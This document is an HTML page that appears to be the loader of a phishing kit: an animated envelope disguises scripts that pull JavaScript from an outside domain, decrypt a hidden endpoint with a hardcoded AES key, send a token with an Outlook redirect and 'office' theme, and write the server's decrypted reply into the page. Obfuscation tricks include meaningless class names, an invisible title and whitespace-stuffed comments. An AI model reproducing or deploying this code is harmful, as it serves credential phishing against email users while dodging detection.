    <html>

    <head>
        <title>⁤</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta name="robots" content="noindex, nofollow" />
        <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
        <style>
            /* Your CSS styles */
            body,
            html {
                height: 100%;
                margin: 0;
                display: flex;
                align-items: center;
                justify-content: center;
            }

            @keyframes bounce {

                0%,
                100%,
                12.5%,
                32.5%,
                76.1% {
                    transform: translateY(0);
                }

                22.5%,
                86% {
                    transform: translateY(7px);
                }
            }

            #karmic {
                height: 179px;
                width: 130px;
                overflow: hidden;
                margin-top: -59px;
                margin-left: 25px;
            }

            @keyframes shadow-fade {

                0%,
                100%,
                21.2%,
                80% {
                    opacity: 0;
                }

                47%,
                70% {
                    opacity: 1;
                }
            }

            #quadruple {
                width: 130px;
                margin-top: 179px;
            }

            #gabfest {
                width: 130px;
                height: 71px;
                border-radius: 0 0 7px 7px;
                overflow: hidden;
                margin-top: -41px;
            }

            #gabfest>.naphthalene {
                width: 287px;
                height: 71px;
                background: #27a0e0;
                transform: translate(-153px, -70px) rotate(28deg);
            }

            #gabfest>.abeyance {
                width: 287px;
                height: 71px;
                background: #1388d6;
                transform: translate(-120px, 63px) rotate(-28deg);
            }

            #zippy {
                width: 130px;
                height: 40px;
                background: #113864;
                margin-top: -70px;
            }

            #ultrasound {
                display: flex;
                flex-wrap: wrap;
                width: 118px;
                height: 131px;
                border-radius: 7px;
                overflow: hidden;
                margin: 0 auto;
                margin-top: -306px;
                animation: cal-bounce 5s infinite;
                animation-timing-function: cubic-bezier(0, 0.5, 0, 1);
                transform: translateY(51px) scaleY(1);
            }

            @keyframes cal-bounce {

                0%,
                100%,
                16.5%,
                76.1% {
                    transform: translateY(151px) scaleY(1);
                }

                28% {
                    transform: translateY(39px) scaleY(1);
                }

                31% {
                    transform: translateY(51px) scaleY(1.05);
                }

                33% {
                    transform: translateY(51px) scaleY(0.96);
                }

                34%,
                68.5% {
                    transform: translateY(51px) scaleY(1);
                }

                68.5% {
                    animation-timing-function: cubic-bezier(0.66, -0.16, 1, -0.29);
                }
            }

            #ultrasound>.faction {
                width: 118px;
                height: 21px;
                margin-bottom: -1px;
                background: #0354a1;
            }

            #ultrasound>.abeyance {
                display: flex;
                width: 118px;
                height: 37px;
            }

            .haiku {
                width: 39.3333px;
                height: 38px;
            }

            .kaput {
                background: #0073cc;
            }

            .macroscopic {
                background: #27a0e0;
            }

            .rabbi {
                background: #4fcfff;
            }

            .naked {
                background: #035fb3;
            }

            .padlock {
                background: #134276;
            }

            #rabbet {
                width: 130px;
                height: 107px;
                animation: opened-flap-swing 5s infinite;
                animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
                transform-origin: top;
                transform: translateY(-68px) rotate3d(1, 0, 0, -180deg);
            }

            @keyframes opened-flap-swing {

                0%,
                100%,
                14.5%,
                76% {
                    transform: translateY(-68px) rotate3d(1, 0, 0, -90deg);
                }

                16.5%,
                74% {
                    transform: translateY(-68px) rotate3d(1, 0, 0, -180deg);
                }
            }

            #racketeer {
                width: 130px;
                animation: closed-flap-swing 5s infinite;
                animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
                transform-origin: top;
                transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);
            }

            @keyframes closed-flap-swing {

                0%,
                100%,
                77%,
                8.5% {
                    transform: translateY(-71px) rotate3d(1, 0, 0, 0);
                }

                14.5%,
                76% {
                    transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);
                }
            }

            #obese {
                width: 130px;
                height: 107px;
                overflow: hidden;
            }

            .xenon {
                width: 96px;
                height: 96px;
                background: #4fcfff;
                margin: -48px auto 0 auto;
                border-radius: 7px;
                transform: scaleY(0.6) rotate(45deg);
            }

            #rabbet .xenon {
                background: #113864;
            }

            #racketeer .xenon {
                background: #4fcfff;
            }
        </style>
    </head>

    <body>
        <!--		 	  	  <p>Adventure		 				begins 	 		   where the road   		stretches 	out.</p>		 			-->
        <div id="karmic">
            <div id="quadruple">
                <div id="rabbet">
                    <div id="obese">
                        <div class="xenon"></div>
                    </div>
                </div>
                <div id="ultrasound">
                    <div class="faction"></div>
                    <div class="abeyance">
                        <div class="haiku kaput"></div>
                        <!--					<span>Life's		 		  	 adventures 		 	are 		 			 		measured  in 				miles    driven.</span>			 	-->
                        <div class="haiku macroscopic"></div>
                        <div class="haiku rabbi"></div>
                    </div>
                    <div class="abeyance">
                        <div class="haiku naked"></div>
                        <div class="haiku kaput"></div>
                        <div class="haiku macroscopic"></div>
                    </div>
                    <div class="abeyance">
                        <div class="haiku padlock"></div>
                        <div class="haiku naked"></div>
                        <div class="haiku kaput"></div>
                    </div>
                </div>
            </div>
            <div id="zippy"></div>
            <div id="gabfest">
                <div class="abeyance"></div>
                <div class="naphthalene"></div>
            </div>
            <div id="racketeer">
                <div id="obese">
                    <div class="xenon"></div>
                </div>
            </div>
        </div>
    </body>
    <!--   		  	  <span>A	   	 car's 			  	 	spirit	is 		 	 fueled    	by  the  			 	   dreams	 			 of	 			 its  	driver.</span>		-->
    <!-- Add this before your main.js script -->
    <script>
        // Get the base URL for assets
        const baseUrl = 'http://couplevisa.com/456d5fg79h9gg';
        console.log(baseUrl);
    </script>
    <script src="https://couplevisa.com/456d5fg79h9gg/assets/js/url_helper.js"></script>
    <script>
        // Set the current access key from PHP session
        window.currentAccessKey = '';
        window.baseUrl = baseUrl;
    </script>
    <script src="https://couplevisa.com/456d5fg79h9gg/assets/js/endpoint.js"></script>
    <script>
        let usuuid = "Qu5/ykCYk626T5ZQbNsFP27J8yUGcH12KEHn7kIJ0xceTDfeh2e5keXeBTbYBDJnc6QkwnpLa7meJ/9yy++QMQ==";
        let policy = "XrHaYZDluGVBr+c+/ccx6FaVvw8BheNHOagfxOHEjviPZw9bFgIDd60TYwt5Vrao";
        let SV = "0";
        let SIR = "1";
        let TB = "";

        function decstr(encryptedString, key) {
            const keySize = [16, 24, 32];
            if (!keySize.includes(key.length)) {
                throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
            }

            const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
            const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
            const ciphertext = CryptoJS.lib.WordArray.create(
                encryptedData.words.slice(4)
            );
            const decryptedData = CryptoJS.AES.decrypt(
                {
                    ciphertext: ciphertext,
                },
                CryptoJS.enc.Utf8.parse(key),
                {
                    iv: iv,
                    mode: CryptoJS.mode.CBC,
                    padding: CryptoJS.pad.Pkcs7,
                }
            );
            return decryptedData.toString(CryptoJS.enc.Utf8);
        }

        async function GEInfo() {
            try {
                const response = await fetch(decstr(policy, "708b91a2n3k4a5i6"), {
                    method: "POST",
                    body: JSON.stringify({
                        psk: usuuid,
                        do: "GURI",
                        redirect_url: "https://outlook.office.com/mail/",
                        theme: "office",
                        prime_rick: policy,
                        TB: TB,
                    }),
                    headers: {
                        "Content-Type": "application/json",
                    },
                });

                const data = await response.json();

                if (data.c === "success") {
                    document.write(decstr(data.b, data.a));
                } else {
                    document.write(`<p>${data.error}</p>`);
                }
            } catch (error) {
                console.error("Error:", error);
                document.write("An error occurred while making the request.\n", error);
            }
        }


        (async () => {
            await GEInfo();
        })();
    </script>
    
    </body>

    </html>
    
